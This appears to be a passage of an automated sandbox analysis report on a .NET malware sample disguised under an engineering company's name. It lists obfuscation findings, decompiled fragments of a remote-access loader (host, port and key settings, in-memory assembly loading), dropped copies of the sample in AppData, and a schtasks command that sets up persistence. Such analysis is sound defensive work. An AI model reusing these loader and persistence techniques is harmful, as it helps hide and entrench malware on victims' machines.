              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: SS Bottmac Engineers Pvt. Ltd..lnk.9.drLNK file: ..\..\..\..\..\SS Bottmac Engineers Pvt. Ltd..exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: OPHt.pdb source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr
              Source: Binary string: OPHt.pdbSHA256 source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs.Net Code: Memory
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.7830000.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.cs.Net Code: bu0KOjBkwv System.Reflection.Assembly.Load(byte[])
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4175ad0.3.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.cs.Net Code: bu0KOjBkwv System.Reflection.Assembly.Load(byte[])
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs.Net Code: Memory
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_0786852F push edx; iretd 0_2_0786854A
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_0786854B push edx; iretd 0_2_07868552
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07868C31 push edi; iretd 0_2_07868C32
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07868BBF push esi; iretd 0_2_07868BC2
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07868B2B push esi; iretd 0_2_07868B32
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07868B29 push esi; iretd 0_2_07868B2A
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07868AE8 push esi; iretd 0_2_07868AEA
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07868A07 push ebp; iretd 0_2_07868A0A
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07869A6B pushad ; iretd 0_2_07869A72
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07869A69 pushad ; iretd 0_2_07869A6A
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_078699F0 pushad ; iretd 0_2_078699F2
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07868919 push esp; iretd 0_2_0786891A
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 9_2_03185880 push esp; iretd 9_2_03185CE9
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 9_2_0318E2A0 push es; ret 9_2_0318E2B6
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 9_2_0318E2C0 push es; ret 9_2_0318E2D6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04E5634D push eax; ret 12_2_04E56361
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_07CC5EB2 push FFFFFF8Bh; iretd 12_2_07CC5EBB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_07CC5E79 push FFFFFF8Bh; iretd 12_2_07CC5E82
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_04E715CD push ebx; ret 17_2_04E715DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_04E7B07C push ebp; ret 17_2_04E7B093
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_04E7B178 push esp; ret 17_2_04E7B19B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_04E7633D push eax; ret 17_2_04E76351
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_04E76D33 pushfd ; ret 17_2_04E76D3A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_02B3634D push eax; ret 20_2_02B36361
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_084973E8 push eax; retf 20_2_084973E9
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: section name: .text entropy: 7.459719521334949
              Source: RTUZKYTc.exe.0.drStatic PE information: section name: .text entropy: 7.459719521334949
              Source: SS Bottmac Engineers Pvt. Ltd..exe.9.drStatic PE information: section name: .text entropy: 7.459719521334949
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, z0CgWreVct1ReW3hxU.csHigh entropy of concatenated method names: 'mDAXFkkbHn', 'dctX5MK7Lg', 'g0vX1UHwpQ', 'j6MXTavJ4c', 'Y18XPtIOUL', 'RhBX43i8tY', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, nlbUxk0n9w0SE2fT7Q.csHigh entropy of concatenated method names: 'WWIO9AVG3', 'Ne7BnsFyu', 'bD7j21WOg', 'QenwWWX3C', 'K4tAy5db2', 'FVVERgVRY', 'KtUTIYS1GuG3NHE4hT', 'TneXqpwWvj94Synw3e', 'sYqXSVatY', 'EY8VvQfHi'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, OZMP2hxHpjh7kQFAPP.csHigh entropy of concatenated method names: 'zHSkBOqRCM', 'fvWkjnFHMI', 'QMUkbnecsd', 'WbRkAByqeu', 'wjyk3yw1ZY', 'bQakUMWAe6', 'PF2kc6KTkL', 'CKJkX9v5wS', 'j9tkMUQEKJ', 'dvnkVTQUiU'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, CrrfYkO0sG17BJWtfW5.csHigh entropy of concatenated method names: 'MJiVYtxXQP', 'pBBVgBtZLN', 'eZKVOZRt5b', 'SXM6a1hB2Wh3aOPU4tB', 'aq00efhW0lmUyDNoI29', 'uddTSNhocRZNSkxL8ov', 'BAAsfnh00pMtM1VHsFv', 'L3vXCmhhfrYCZSKbPqy'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, xqcOSno5WVFAjguVYG.csHigh entropy of concatenated method names: 'PjeCHrVhhT', 'fJ1Cww9irJ', 'TNMk1c5LZM', 'Tx8kThUqZg', 'M91k4QKN9X', 'HS1kDOGODI', 'ox1k8tdxFm', 'dcQkQJxjMj', 'An2khOu51C', 'OJpksIvvBn'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, Uuj6qeW9tPXjBmNpHg.csHigh entropy of concatenated method names: 'ToString', 'BxxUm4fk9J', 'Qv0U57V9et', 'gfvU19R5LD', 'YJjUTfT8hJ', 'r4HU4xrivv', 'nnDUDT8Nm7', 'xWNU8CFPl5', 'IFHUQJSC27', 'NkdUhwRTFH'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, gv9ulKIH2QRgfIOudI.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Wo1qJryaEA', 'DqWqI58PXB', 'W3Uqz4ix98', 'J0XS9mcDjl', 'Y0oS6IBJBx', 'Q4JSqtkwUt', 'Ab2SSpPgvw', 'pIlUKKBtDd2wBeZchht'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, MBp5MtOrZjC7IY1p5BK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g1qVPmxEEJ', 'DRMVvWacuy', 'gRrV0MPdjr', 'X7cVp0KttN', 'MeAVruIKI5', 'EdvVuP6MHE', 'aduV2JUp5X'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, gsQB8HRrROaMJigu8D.csHigh entropy of concatenated method names: 'AnOce1l820', 'HwXcW7xNac', 'ToString', 'NxlcdYfZPl', 'oEycauIgFw', 'Fc6ck42L0Z', 'PHCcCyhJ6e', 'wbrcipe1dp', 'T7vcZ0xLjW', 'VTLcniYyOl'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, jVOKqx6OHHAubw6pMN.csHigh entropy of concatenated method names: 'wV4NbIA5QD', 'CUQNAQr6Vs', 'nE6NFKTVhT', 'T1AN5dYyo7', 'vi6NT4mdAu', 'D00N4j8Bxg', 'OlNN8UZn9K', 'P1TNQuolZP', 'oTBNs4HKnn', 'I1ENmDMYmn'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.csHigh entropy of concatenated method names: 't4rSL2c26G', 'SxXSd44Tdi', 'rZxSaJFkXb', 'fiXSkdiHdM', 'Ou0SCt4Dx9', 'G6ySiMIOnA', 'oGQSZfZ18x', 'LSiSnhZ3ll', 'IN7SfWnrA4', 'YvESeiRRFw'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dJa6sC2NfcTNVggMrM.csHigh entropy of concatenated method names: 'EZ6c7IB2gG', 'wbUcILSSQm', 'QT1X9jI0iR', 'tRkX6YTTiD', 'PWZcmH7bNt', 'iPqct10GRt', 'hPocxEkDp2', 'x1jcPfIGNT', 'xo6cvB2C6B', 'lUwc0vhIE4'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, vBXDN7cPr3ZGX8ky0g.csHigh entropy of concatenated method names: 'vEN6ZLAlPY', 'nlB6nVC6YJ', 'tX36e6QIRP', 'dH76W27ASA', 'fIt63JQWM9', 'plL6UVm9uL', 'GPnvoA4eyKgKhSgeYK', 'Oe5HtK52Gi0QMqiaCu', 'cor66QSbY9', 'Utk6SCP6jg'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, LuuKNTdSfqNmEuA9vR.csHigh entropy of concatenated method names: 'NyTXdUUnST', 'SAbXaci9UC', 'a1tXkmH6ka', 'biiXCjp2hq', 'aqkXiXthGN', 'aLKXZvFiyM', 'sRAXn1GsPH', 'MbCXfEwaJF', 'OGeXeXX8FR', 'accXWdo6pP'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, iQwA4eOJ8Zfn4HwcUAj.csHigh entropy of concatenated method names: 'cEXMYd4SRm', 'kkeMgRcSuH', 'nCqMOCYQc7', 'bQ7MBqi27n', 'HmbMHmWmU4', 'X7jMjqHQq0', 'CmsMwlGo8d', 'CYoMb6XpQ4', 'afnMAwQsUD', 's3fMEbsAEH'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, LwbRpltv1eAnYuONRA.csHigh entropy of concatenated method names: 'fhw3seLceb', 'x6S3tB16bH', 'vlk3Pk2ZwH', 'zFP3vf2m0M', 'iNu35BAFAo', 'KIU31Tia8Y', 'fdd3T36ZGr', 'zbM34jg97S', 'Mcm3DpfXPH', 'lmv38Hc11g'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, rWZZ7wHORJniJhaBFo.csHigh entropy of concatenated method names: 'Dispose', 'xoF6JoJX1N', 'lcEq57qBiY', 'cfgGG8m4Yr', 'iDr6IHDL7W', 'Wva6ziaYYN', 'ProcessDialogKey', 'sccq928ptv', 'S7vq691ehf', 'YPbqqChRhg'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, OM9lZPwkAKr27WGp6r.csHigh entropy of concatenated method names: 'GV1M60hwBb', 'F4MMSvjG1c', 'qQyMKjlQ04', 'PYaMdml7lZ', 'NJVMaKQwNU', 'NSnMCsgNBB', 'HYRMiaN6mt', 'HwxX2jeeW1', 'JWFX7MXQYH', 'OiJXJw5oEU'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, jO1kLrkP6ITRPB9nRt.csHigh entropy of concatenated method names: 'e3yiLkv75w', 'Kvqia7Oluw', 'iXLiCiQfMB', 'RuuiZm7rqr', 'XWIincnmRA', 'biPCrgXJTD', 'NYeCuR1g51', 'swwC2J3LQV', 'pmhC7kZtQP', 'wwUCJdl7pJ'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, BCDpIFlNesVBIhQHgH.csHigh entropy of concatenated method names: 'lXwaPYplWD', 'z8Nav71VNK', 'iANa0QeSDq', 'j1Wap46uak', 'KPdarOnI7r', 'uYfaunmUii', 'u0Oa24HKnA', 'XsMa7Bwc1Z', 'ofiaJfrVbH', 'lr3aIFIlXL'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, GXpMZGv1DYx8eclQhb.csHigh entropy of concatenated method names: 'KoPZYBhF60', 'rncZgltk8v', 'Gl9ZOe5NAl', 'wnZZBSVfSR', 'K11ZHipBT4', 'AfsZjno0nB', 'T3DZw9LAED', 'PKVZbfGvp0', 'FncZAWsLVC', 'Ru5ZE8OZeU'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, ibRWnPCp5Mnp1nfdT7.csHigh entropy of concatenated method names: 'jxiZdXpYPh', 'BZwZkGZ8QB', 'oIYZiFpI7x', 'VIJiImoIrk', 'huRizFyiho', 'FDMZ9qipOS', 'umsZ6t9Q1O', 'aZoZq8PCQE', 'ooIZSlQtB1', 'W9SZKBc8tf'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, z0CgWreVct1ReW3hxU.csHigh entropy of concatenated method names: 'mDAXFkkbHn', 'dctX5MK7Lg', 'g0vX1UHwpQ', 'j6MXTavJ4c', 'Y18XPtIOUL', 'RhBX43i8tY', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, nlbUxk0n9w0SE2fT7Q.csHigh entropy of concatenated method names: 'WWIO9AVG3', 'Ne7BnsFyu', 'bD7j21WOg', 'QenwWWX3C', 'K4tAy5db2', 'FVVERgVRY', 'KtUTIYS1GuG3NHE4hT', 'TneXqpwWvj94Synw3e', 'sYqXSVatY', 'EY8VvQfHi'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, OZMP2hxHpjh7kQFAPP.csHigh entropy of concatenated method names: 'zHSkBOqRCM', 'fvWkjnFHMI', 'QMUkbnecsd', 'WbRkAByqeu', 'wjyk3yw1ZY', 'bQakUMWAe6', 'PF2kc6KTkL', 'CKJkX9v5wS', 'j9tkMUQEKJ', 'dvnkVTQUiU'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, CrrfYkO0sG17BJWtfW5.csHigh entropy of concatenated method names: 'MJiVYtxXQP', 'pBBVgBtZLN', 'eZKVOZRt5b', 'SXM6a1hB2Wh3aOPU4tB', 'aq00efhW0lmUyDNoI29', 'uddTSNhocRZNSkxL8ov', 'BAAsfnh00pMtM1VHsFv', 'L3vXCmhhfrYCZSKbPqy'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, xqcOSno5WVFAjguVYG.csHigh entropy of concatenated method names: 'PjeCHrVhhT', 'fJ1Cww9irJ', 'TNMk1c5LZM', 'Tx8kThUqZg', 'M91k4QKN9X', 'HS1kDOGODI', 'ox1k8tdxFm', 'dcQkQJxjMj', 'An2khOu51C', 'OJpksIvvBn'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, Uuj6qeW9tPXjBmNpHg.csHigh entropy of concatenated method names: 'ToString', 'BxxUm4fk9J', 'Qv0U57V9et', 'gfvU19R5LD', 'YJjUTfT8hJ', 'r4HU4xrivv', 'nnDUDT8Nm7', 'xWNU8CFPl5', 'IFHUQJSC27', 'NkdUhwRTFH'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, gv9ulKIH2QRgfIOudI.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Wo1qJryaEA', 'DqWqI58PXB', 'W3Uqz4ix98', 'J0XS9mcDjl', 'Y0oS6IBJBx', 'Q4JSqtkwUt', 'Ab2SSpPgvw', 'pIlUKKBtDd2wBeZchht'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, MBp5MtOrZjC7IY1p5BK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g1qVPmxEEJ', 'DRMVvWacuy', 'gRrV0MPdjr', 'X7cVp0KttN', 'MeAVruIKI5', 'EdvVuP6MHE', 'aduV2JUp5X'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, gsQB8HRrROaMJigu8D.csHigh entropy of concatenated method names: 'AnOce1l820', 'HwXcW7xNac', 'ToString', 'NxlcdYfZPl', 'oEycauIgFw', 'Fc6ck42L0Z', 'PHCcCyhJ6e', 'wbrcipe1dp', 'T7vcZ0xLjW', 'VTLcniYyOl'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, jVOKqx6OHHAubw6pMN.csHigh entropy of concatenated method names: 'wV4NbIA5QD', 'CUQNAQr6Vs', 'nE6NFKTVhT', 'T1AN5dYyo7', 'vi6NT4mdAu', 'D00N4j8Bxg', 'OlNN8UZn9K', 'P1TNQuolZP', 'oTBNs4HKnn', 'I1ENmDMYmn'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.csHigh entropy of concatenated method names: 't4rSL2c26G', 'SxXSd44Tdi', 'rZxSaJFkXb', 'fiXSkdiHdM', 'Ou0SCt4Dx9', 'G6ySiMIOnA', 'oGQSZfZ18x', 'LSiSnhZ3ll', 'IN7SfWnrA4', 'YvESeiRRFw'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dJa6sC2NfcTNVggMrM.csHigh entropy of concatenated method names: 'EZ6c7IB2gG', 'wbUcILSSQm', 'QT1X9jI0iR', 'tRkX6YTTiD', 'PWZcmH7bNt', 'iPqct10GRt', 'hPocxEkDp2', 'x1jcPfIGNT', 'xo6cvB2C6B', 'lUwc0vhIE4'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, vBXDN7cPr3ZGX8ky0g.csHigh entropy of concatenated method names: 'vEN6ZLAlPY', 'nlB6nVC6YJ', 'tX36e6QIRP', 'dH76W27ASA', 'fIt63JQWM9', 'plL6UVm9uL', 'GPnvoA4eyKgKhSgeYK', 'Oe5HtK52Gi0QMqiaCu', 'cor66QSbY9', 'Utk6SCP6jg'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, LuuKNTdSfqNmEuA9vR.csHigh entropy of concatenated method names: 'NyTXdUUnST', 'SAbXaci9UC', 'a1tXkmH6ka', 'biiXCjp2hq', 'aqkXiXthGN', 'aLKXZvFiyM', 'sRAXn1GsPH', 'MbCXfEwaJF', 'OGeXeXX8FR', 'accXWdo6pP'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, iQwA4eOJ8Zfn4HwcUAj.csHigh entropy of concatenated method names: 'cEXMYd4SRm', 'kkeMgRcSuH', 'nCqMOCYQc7', 'bQ7MBqi27n', 'HmbMHmWmU4', 'X7jMjqHQq0', 'CmsMwlGo8d', 'CYoMb6XpQ4', 'afnMAwQsUD', 's3fMEbsAEH'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, LwbRpltv1eAnYuONRA.csHigh entropy of concatenated method names: 'fhw3seLceb', 'x6S3tB16bH', 'vlk3Pk2ZwH', 'zFP3vf2m0M', 'iNu35BAFAo', 'KIU31Tia8Y', 'fdd3T36ZGr', 'zbM34jg97S', 'Mcm3DpfXPH', 'lmv38Hc11g'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, rWZZ7wHORJniJhaBFo.csHigh entropy of concatenated method names: 'Dispose', 'xoF6JoJX1N', 'lcEq57qBiY', 'cfgGG8m4Yr', 'iDr6IHDL7W', 'Wva6ziaYYN', 'ProcessDialogKey', 'sccq928ptv', 'S7vq691ehf', 'YPbqqChRhg'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, OM9lZPwkAKr27WGp6r.csHigh entropy of concatenated method names: 'GV1M60hwBb', 'F4MMSvjG1c', 'qQyMKjlQ04', 'PYaMdml7lZ', 'NJVMaKQwNU', 'NSnMCsgNBB', 'HYRMiaN6mt', 'HwxX2jeeW1', 'JWFX7MXQYH', 'OiJXJw5oEU'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, jO1kLrkP6ITRPB9nRt.csHigh entropy of concatenated method names: 'e3yiLkv75w', 'Kvqia7Oluw', 'iXLiCiQfMB', 'RuuiZm7rqr', 'XWIincnmRA', 'biPCrgXJTD', 'NYeCuR1g51', 'swwC2J3LQV', 'pmhC7kZtQP', 'wwUCJdl7pJ'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, BCDpIFlNesVBIhQHgH.csHigh entropy of concatenated method names: 'lXwaPYplWD', 'z8Nav71VNK', 'iANa0QeSDq', 'j1Wap46uak', 'KPdarOnI7r', 'uYfaunmUii', 'u0Oa24HKnA', 'XsMa7Bwc1Z', 'ofiaJfrVbH', 'lr3aIFIlXL'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, GXpMZGv1DYx8eclQhb.csHigh entropy of concatenated method names: 'KoPZYBhF60', 'rncZgltk8v', 'Gl9ZOe5NAl', 'wnZZBSVfSR', 'K11ZHipBT4', 'AfsZjno0nB', 'T3DZw9LAED', 'PKVZbfGvp0', 'FncZAWsLVC', 'Ru5ZE8OZeU'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, ibRWnPCp5Mnp1nfdT7.csHigh entropy of concatenated method names: 'jxiZdXpYPh', 'BZwZkGZ8QB', 'oIYZiFpI7x', 'VIJiImoIrk', 'huRizFyiho', 'FDMZ9qipOS', 'umsZ6t9Q1O', 'aZoZq8PCQE', 'ooIZSlQtB1', 'W9SZKBc8tf'
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeJump to dropped file
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile created: C:\Users\user\AppData\Roaming\RTUZKYTc.exeJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"
